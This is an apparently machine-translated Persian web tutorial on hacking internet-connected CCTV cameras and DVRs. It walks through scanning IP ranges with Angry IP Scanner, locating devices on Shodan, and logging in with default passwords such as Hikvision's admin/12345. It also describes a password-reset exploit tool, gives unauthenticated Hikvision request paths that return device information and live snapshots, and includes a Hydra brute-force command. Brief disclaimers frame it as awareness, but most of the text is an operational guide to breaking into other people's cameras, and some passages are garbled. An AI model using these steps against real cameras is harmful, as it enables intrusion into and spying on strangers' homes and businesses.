سیستم‌های امنیتی و حفاظتیدوربین مداربسته

هک دوربین مداربسته با استفاده از کلمه عبور پیش فرض

فهرست مطالب

در توضیحات این مقاله واقعا هک کردن نیست اما کار می کند.

شما فقط باید دوربین دوربین مدار بسته را به صورت آنلاین پیدا کنید .

و سعی کنید از گذرواژه پیش فرض استفاده کنید،

بسیاری از دستگاه های موجود در اینترنت هنوز با استفاده از همان رمز عبور اصلی از کارخانه استفاده می کنند.

ایده این است که نگاهی به کتابچه راهنمای دوربین آی فون و نگاهی به رمز عبور پیش فرض،

به طوری که شما می توانید آن را برای هک دوربین دوربین مدار بسته (و یا ضبط کننده) استفاده کنید.

چگونه دوربین IP را در اینترنت پیدا کنید / هک دوربین مداربسته

خوب، قبل از شما سعی می کنید رمز عبور پیش فرض برای هک دوربین های مدار بسته شما نیاز به آنها را پیدا کنید .

در اینترنت و راه های مختلفی برای انجام این کار، اجازه دهید .

از روش اول که با استفاده از یک اسکنر IP شبکه برای پیدا کردن دستگاه های IP آنلاین بررسی وجود دارد.

در این مقاله به شما آموزش خواهم داد که چگونه از اسکنر Angry IP برای اسکن کردن اینترنت استفاده کنید.

به دنبال دوربین های IP و ضبط (DVR ها و NVR ها)

مرحله 1 – دانلود اسکنر Angry IP / هک دوربین مداربسته

برای دانلود اسکنر Angry IP برای سیستم عامل خود اینجا کلیک کنید: ویندوز، مک و یا لینوکس.

زیر وب سایت Angry IP Scanner را ببینید. اطمینان حاصل کنید.

که جاوا نصب شده است و نسخه صحیح را برای رایانه خود دانلود کنید.

 

Install ANgry IP Scanner to hack CCTV camera

مرحله 2 – نصب اسکنر Angry IP / هک دوربین مداربسته

نصب بسیار ساده است. شما فقط باید فایل نصب را اجرا کنید و دستورالعمل ها را همانطور که در تصاویر زیر نشان داده شده دنبال کنید.

 

هک دوربین مداربسته

 

هک دوربین مداربسته

 

هک دوربین مداربسته

 

مرحله 3 – پورت های Angry IP Scanner و پیستون را پیکربندی کنید.

برای پیدا کردن اطلاعاتی که ما دنبال آن هستیم برای هک دوربین های IP لازم است.

پیکربندی پورت های Angry IP اسکنر و fetchers، بنابراین می تواند اطلاعات مناسب را نمایش دهد.

تصویر زیر را برای تنظیمات مشاهده کنید.

 

Angry IP Scanner Preference

 

پورت 80، 23، 8080، 8081 و 8082 را پیکربندی کنید که بیشترین استفاده افرادی است .

که دوربین های IP را نصب می کنند و به اینترنت در دسترس هستند.

 

Angry IP Scanner Port Configuration to hack CCTV camera

 

پیکربندی fetchers برای نمایش اطلاعات وب شناسایی که برخی از اطلاعات دستگاه را نشان می دهد که مفید است.

برای پیدا کردن کسی که سازنده است نشان می دهد.

برای داشتن یک دوربین CCTV واقعا لازم است که چنین اطلاعات اساسی ای داشته باشد.

برای باز کردن پنجره پیکربندی، به ابزار بروید و روی fetchers کلیک کنید.

 

Angry IP Scanner fetchers

 

وبگردی را انتخاب کنید و در سمت راست آن را انتخاب کنید و روی فلش کلیک کنید.

تا آن را به سمت چپ حرکت دهید تا بتوانید آن را در صفحه اصلی نرم افزار نمایش دهید.

 

Angry IP Scanner Fetchers to hack CCTV camera

 

مرحله 4 – محدوده بندر IP را برای اسکن انتخاب کنید / هک دوربین مداربسته

برای اولین باردوربین مداربسته، برای پیدا کردن یک موجود در اینترنت ضروری است.

بنابراین شما باید یک محدوده آدرس IP را برای اسکن کردن با اسکنر Angry IP انتخاب کنید.

تصویر زیر را که در آن یک محدوده آدرس IP اسکن شده را مشاهده کنید.

 

IP Angry Scanner Results for Hikvision DVRs

 

شما می توانید از محدوده IP از کشور یا ارائه دهنده خدمات خود استفاده کنید.

در مثال بالا من از محدوده xx.242.10.0 به xx.242.10.255 استفاده می شود.

توجه داشته باشید که می توانید قسمت اول محدودهIPرا پر کنید و برای مثال24/یا 16راانتخاب کنید.

تا نرم افزار بتواند محدوده را برای شما با 254 یا 65.534میزبان انتخاب کند.

به دلایل خصوصی، بخش اول IP نشان داده نمی شود، پس تنها چند اسکن می توان دو DVR Hikvision را که در اینترنت هستند،.

پیدا کنید. من می دانم که به دلیل اطلاعات وب شناسایی که DNVRS-Webs را نشان می دهد.

اسکن را می توان برای هزاران آدرس IP انجام داد.

بنابراین برای یافتن بسیاری از دوربین های IP، DVR ها و NVR هایی که به اینترنت متصل هستند بسیار معمول است.

پس از پیدا کردن یک دوربین IP یا DVR آنلاین، فقط باید روی دکمه راست کلیک کنید .

آن را در مرورگر وب باز کنید. درست مثل تصویر زیر نشان داده شده است.

 

Angry IP Scanner Open in a Web Browser

در این مورد این دستگاه Hikvision DVR است و شما فقط می توانید از کاربر پیش فرض و رمز عبور استفاده کنید.

 

“admin / 12345” در کتابچه راهنمای Hikvision یافت می شود.

Hikvision DVR Login Screen

نام سازنده (Hikvision) را در زیر صفحه ورود به سیستم یادداشت کنید.

گاهی اوقات شما یک لوگو بزرگ و گاهی اوقات یک متن کوچک مانند این می بینید.

ایده ای داشتی؟ برای هک دوربین دوربین مداربسته شما فقط باید از یک ابزار برای اسکن کردن اینترنت استفاده کنید.

یک دستگاه آنلاین پیدا کنید و رمز عبور پیش فرض را که می توانید از دفترچه راهنمای تولید کننده .

یا از فهرست پیش فرض لیست پیش فرض دوربین IP دریافت کنید، امتحان کنید.

در زیر تصویر از DVR پس از ورود به حساب کاربری admin / 12345.

 

Hikvision Hacked DVR

 

مثال ساده تر با این سازنده (Hikvison) ساده تر است، زیرا دستگاه های زیادی در سراسر جهان وجود دارد.

اما این روند همچنین با مارک های دیگر کار می کند تا زمانی که شما می توانید اطلاعات وب را شناسایی کنید.

و سعی کنیداز admin / password پیش فرض استفاده کنید مدارک مورد نیاز دوربین دوربین مدار بسته.

هک دوربین مدار بسته جزئیات دوربین.

اگر می خواهید اطلاعات اضافی در مورد چگونگی کارکرد دوربین هک دوربین را مطالعه کنید.

این مهم است که فرایندرادرک کنید تا بتوانید از هکرهادرتلاش برای وارد شدن به دوربین امنیتی IP خودتان محافظت کنید.

How CCTV camera hack work diagram

 

اسکنر شبکه (Angry IP scanner) برای بازیابی اطلاعات از روتر که در اینترنت است، استفاده می شود.

همانطور که در تصویر زیر نشان داده شده است:

How CCTV camera hack work diagram explanation

توجه داشته باشید که این فرایند طبیعی است، روتر اطلاعات لازم را پنهان نمیکند.

پاسخ خدماتی را که در دسترس هستند را پاسخ خواهد داد.

ما می توانیم فرایند را با یک فروشگاه منظم مقایسه کنیم، مالک مکان محل و سرویس های موجود را پنهان نمی کند.

بنابراین مردم می توانند از آنها استفاده کنند. مالک فقط فروشگاه کلیدی در دسترس عموم را نخواهد داشت.

3. هک دوربین مدار بسته با استفاده از shodan.

این تکنیک برای دور زدن دوربین CCTV بسیار شبیه به گذشته است.

اما شما نیازی به نصب یک نرم افزار برای اسکن کردن شبکه ندارید.

این فرآیند قبلا برای شما انجام شده است و شما فقط باید سعی کنید از اعتبار ورود استفاده کنید.

Shodan خدماتی در وب سایت است که دستگاه های اینترنت را در سراسر جهان نشان می دهد.

و شامل دوربین های امنیتی IP، DVR ها و NVR ها می باشد.

لازم است فقط نام بردن یک دوربین IP یا نام سازنده را تایپ کنید و Shodan اطلاعات زیادی را نشان می دهد.

که شامل تعداد دستگاه ها در سراسر جهان، محل، IP و پورت های باز است.

نگاهی به تصویر زیر و ببینید که چقدر اطلاعات در دسترس است.

Hack CCTV camera with Shodan

 

اگر یک حساب کاربری رایگان را در سایت ایجاد کنید، Shodan به شما این امکان را میدهد که اطلاعات را فیلتر کنید.

زیر یک مثال را ببینید که در آن اطلاعات توسط کشور (برزیل) فیلتر شده است.

و نگاهی به جزئیات که شامل تعداد دوربین در هر شهر (سائوپائولو ) و حتی ارائه دهنده ی ISP (Vivo).

 

Using Shodan to hack CCTV camera

Shodan جزئیات در مورد دستگاه IP را نشان می دهد.

برای مشاهده جزئیات دستگاه آی پی فقط در لینک جزئیات کلیک کنید و پنجره های جدید باز خواهد شد.

تا تمام اطلاعات مربوط به دوربین CCTV که می خواهید هک کنید را نشان دهید.

 

 

Shodan Details

جزئیات مکان و مالک دستگاه
پنجره های جزئیات نشان دهنده IP دستگاه و حتی نام سازمان است.

Shodan Device Details - IP and company

جزئیات مربوط به پورت های دستگاه

همانطور که قبلا مشاهده کردیم، هر دستگاه آی پی در اینترنت دارای یک IP هست.

همچنین برخی از خدمات با استفاده از پورت های خاص است.

Shodan می تواند این اطلاعات را بسیار واضح نشان دهد، همانطور که در تصویر زیر نشان داده شده است.

Shodan Camera Details Port and Model

 

پس از دیدن جزئیات، شما فقط باید از مرورگر وب برای تایپ IP دستگاه IP و پورت استفاده کنید و سعی کنید.

از کاربر پیش فرض و رمز عبور استفاده کنید همانطور که قبلا در این مقاله شرح داده شده است. تصویر زیر را ببینید.

 

برای این دوربین من فقط IP و پورت را به صورت زیر نوشتم: XX.226.219.250: 88

 

DVR Login Screen

اگر شما خوش شانس و دوربین های IP (یا DVR) رمز عبور است هرگز تغییر داده شده است.

شما قادر به ورود با تایپ کردن رمز عبور به طور پیش فرض دستگاه خواهد بود.

4. دوربین دوربین مداربسته با استفاده از ابزار سوء استفاده (نرم افزار).

بنابراین شما می خواهید برای هک دوربین های مدار بسته اما نام کاربری و رمز عبور به طور پیش فرض توسط کسی تغییر یافت.

به طوری که شما می توانید دوربین های مدار بسته ابزار بهره برداری استفاده کنید.

هنگامی که یک دستگاه IP دارای یک مشکل امنیتی است.

هکرها می توانند ابزارهای بهره برداری را برای بهینه سازی فرآیند هک ایجاد کنند. این هم با دوربین های IP اتفاق می افتد.

نقص امنیتی Hikvision IP دوربین

در مارس 2017 یک نقص امنیتی در دوربین های هایک ویژن IP که اجازه می دهد تا دسترسی مستقیم به اطلاعات دستگاه مانند

مدل، شماره سریال، نسخه سیستم عامل، و کاربران کشف شد.

این مشکل به Hikvision در تاریخ 6 مارس 2017 گزارش شد، که به سرعت مورد بررسی قرار گرفت و وجود شکست را پذیرفت.

 

پنج روز بعد هایک ویژن منتشر حل برای مشکل، اما دوربین که با استفاده از سیستم عامل های قدیمی هنوز هم در معرض این نقص امنیتی خواهد بود.

چگونه با استفاده از دوربین IP کار می کند

فقط به عنوان مثال من در مورد یک نرم افزار ایجاد شده برای بهره برداری آسیب پذیری.

امنیتی در دوربین های هایک ویژن IP که با استفاده از سیستم عامل خاص قدیمی صحبت کنید.

هک دوربین مداربسته

بدیهی است، شما نیاز به اطلاعات دوربین IP دارید تا بتوانید نرم افزار را به درستی پیکربندی کنید،

و من به شدت توصیه می کنم که از این ابزار در دوربین های Hikvision IP خود استفاده کنید یا مجوز اجرای آزمایش های امنیتی را داشته باشید.

سلب مسئولیت:
من مسئول هیچ یک از اعمال شما نیستم شما تصور نمی کنیددوربین دوربین مداربسته که به شما تعلق نداردراببندید.
ابزار Explosion Hikvision می تواند برای آزمایش دوربین های IP شما و اطمینان از آسیب.
پذیری امنیتی آن توسط به روز رسانی سیستم عامل تعیین شود. هشدار داده شده است.

خوب،اکنون که میدانید فرض نمیکنید که دوربینهایIPدیگران راهک کنید،اجازه دهیددرباره ابزارسوء استفاده Hikvisionصحبت کنیم. تصویر زیر را ببینید.

هک دوربین مداربسته

سوءاستفاده می تواند دوربین دوربین مداربسته را با وارد کردن لیست است.

کاربر داخلی IP دوربین و تنظیم یک رمز جدید برای یکی از آنها با توجه به انتخاب شما.

برای استفاده از نرم افزار فقط مراحل زیر را دنبال کنید.

1. دوربین IP و پورت را وارد کنید

2. روی “دریافت لیست کاربر” کلیک کنید

3. کاربر برای تغییر رمز عبور را انتخاب کنید

4. یک رمز عبور جدید را وارد کنید و روی دکمه کلیک کنید.

هک دوربین مداربسته

پس از انجام این مراحل،فقط بایدIP Cameraو پورت رادریک مرورگر وب تایپ کنیدوبا استفاده ازاعتبارنامه ای که تازه ایجاد کرده اید وارد شوید.

دوربین های تحت تاثیر آسیب پذیری امنیتی

زیر مدل های دوربین Hikvision را که تحت تاثیر این مسئله آسیب پذیری امنیتی هستند مشاهده کنید. اگر شما یکی از آنها را فقط ارتقا دهید.

سیستم عامل به درستی به مشکل، بنابراین شما دوربین دوربین مداربسته خود را هک نشده است.

هک دوربین مداربسته
Hikvision camera affected firmware

 

چگونه اطلاعات دوربین IP را دریافت کنید.

همچنین می توانید دوربین Hikvision را فقط با ارسال یک فرمان خاص که اطلاعات دوربین رادریافت می کند یایک عکس روی صفحه نمایش بگیرید.

نیز ممکن کنید. همان مدل و نسخه سیستم عامل که در بالا توضیح داده شده تحت تاثیر این مسئله قرار دارند.

اگر IP Camera و پورت زیر را با دستور زیر وارد کنید، جزئیات دوربین مانند نام دستگاه، مدل و نسخه سیستم عامل را مشاهده خواهید کرد.

System/deviceInfo?auth=YWRtaW46MTEK

بنابراین فرمان کامل است:

<دوربین IP>: <پورت دوربین> System / deviceInfo؟ auth = YWRtaW46MTEK

 

 

<camera IP>:<camera port> System/deviceInfo?auth=YWRtaW46MTEK

 

دوربین اطلاعات را درست همانطور که در تصویر زیر نشان داده می شود:

 

 

<DeviceInfo xmlns=”http://www.hikvision.com/ver10/XMLSchema” version=”1.0″>

 

<deviceName>IP CAMERA</deviceName>

 

<deviceID>88</deviceID>

 

<deviceDescription>IPCamera</deviceDescription>

 

<deviceLocation>hangzhou</deviceLocation>

 

<systemContact>Hikvision.China</systemContact>

 

 

<model>DS-2CD2420F-IW</model>

 

<serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>

 

<macAddress>a4:14:37:xx:xx:xx</macAddress>

 

<firmwareVersion>V5.4.5</firmwareVersion>

 

<firmwareReleasedDate>build 170123</firmwareReleasedDate>

 

<bootVersion>V1.3.4</bootVersion>

 

<bootReleasedDate>100316</bootReleasedDate>

 

<hardwareVersion>0x0</hardwareVersio

 

</DeviceInfo>

نحوه گرفتن یک عکس دوربین

فقط با صدور فرمان مشابهی امکان گرفتن تصویر تصویری دوربین IP وجود دارد و آنچه در پشت دوربین CCTV دیده می شود.

این نقص امنیتی است.

برای گرفتن عکس تصویری دوربین IP، زیر فرمان را مشاهده کنید.

 

onvif-http/snapshot?auth=YWRtaW46MTEK

بنابراین فرمان کامل است:

<دوربین IP>: <پورت دوربین> onvif-http / عکس فوری؟ auth = YWRtaW46MTEK

پس از انتشار این دستور به دوربین IP Hikvision، تصویر زیر در مرورگر وب بدون نیاز به احراز هویت نمایش داده می شود.

هک دوربین مداربسته
Hikvision camera exposed – Screenshot

تصویری از دوربین Hikvision IP (برای بزرگنمایی کلیک کنید)

 

سلب مسئولیت: تصویر بالااز یک دوربین Hikvisionاست که بااستفاده ازیک نسخه از سیستم عامل قدیمی که قبلا دراین مقاله شرح داده شد.

این شرکت برای این مسئله ثابت کرده است، بنابراین مدل های جدید این نقص امنیتی را ندارند.

6. دوربین های دوربین مداربسته را با حمله نیروی بی رحمانه هک کنید.

فقط تصور کنید دوربین CCTV با استفاده از یک.

کلمه عبور است که بر اساس یک کلمه منظم است

که می تواند در “خدایان، خانه ها، راز” و غیره یافت شود

کسی می تواند دوربین دوربین CCTV را فقط باتلاش برای یافتن همه ی این کلمات عبور تازمانی که یک صحنه درست را پیدا کند، هک کند.

این چیزی است که کار می کند.

خوب، اکنون شما فکرمی کنید که این روش خیلی سخت و آهسته است.

زیرا پیچیدگی هر کلمه ای که در یک فرهنگ لغت در دسترس است.

برای پیدا کردن کسی که می خواهید برای ورود به دوربین دوربین مداربسته، درست باشد؟

خوب، اگر این کار را به یک نرم افزار که بتواند صدها یا هزاران هزار کلمه عبور را آزمایش کند.

می توانید شانس بیشتری برای موفقیت داشته باشید.

برای درک این که چگونه این روش کار می کند، به نمودار زیر نگاهی بیاندازید.

هک دوربین مداربسته
Hack CCTV camera using Hydra
شما می توانید از Hydra برای لینوکس یا ویندوز استفاده کنید .

فقط لازم است که فایل رمز عبور خود را آماده کلمات مورد. نظر شما می خواهید استفاده کنید و دستور را صادر کنید.

 

 

hydra -s 88 -l admin -P /root/desktop/pass.txt -e ns  <camera IP>

زیر نحو را ببینید

-s 88 – شماره پورت در دوربین IP

-l admin – نام کاربری پیش فرض که مورد استفاده قرار خواهد گرفت (admin)

-P / root /desktop/pass.txt – فایل لیست پرونده شما

-e — رمز عبور خالی

ns — سعی کنید وارد شوید و رمز عبور را خالی کنید

 

هک دوربین مداربسته
Hack CCTV camera using Hydra
این نرم افزار اجرا می شود و شروع به تلاش برای یافتن کلمات مختلف از فایل TXT می کند و همچنان این کار را انجام می دهد.

تا زمانی که یک بازی وجود داشته باشد. اگر دوربین CCTV برای کسانی که سریع تلاش می کند این فقط یک سوال از زمان به نرم افزار پیدا کردن رمز عبور درست است.

دوربین های مدرن دوربین مداربسته IP اجازه نمی دهند این نوع حمله های خشونت آمیز را مجاز بدانند زیرا برخی از زمان ها پس از تلاش های زیادی برای ورود به سیستم خود را مسدود می کنند.

 

کلمات نهایی و نتیجه گیری

راه های مختلفی برای دور زدن دوربین دوربین مداربسته وجود دارد و همه آنها شامل حداقل مهارت های اولیه از مهاجم است.

که باید حداقل در مورد اینترنت و نحوه استفاده از کامپیوتر و نرم افزار آن را درک کند.

مراقب باشید که هر دستگاه آی پی که به اینترنت متصل است در معرض خطر است و هیچ تضمینی وجود ندارد که آن 100٪ باشد و کسی آن را نمی تواند هک کند.

ایده این مقاله این است که به مردم کمک کند تا بدانند چگونه یک دوربین CCTV را می توان هک کرد و چگونگی به حداقل رساندن شانس مهاجم.

من بعضی از نمونه ها را فقط برای نشان دادن اینکه چه کاری ممکن است انجام دهم و بیشتر تکنیک های استفاده شده.

توسط هکرها می توانم با دستگاه های مختلف کار کنم.

توجه: من هیچ سازنده یا نام تجاری دوربین مداربسته را

 

پشتیبانی نمیکنم .

و همچنین هیچ تلاشی برای گرفتن عکس به دیگران دوربین را توصیه نمی کنم.

نمایش بیشتر

نوشته های مشابه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا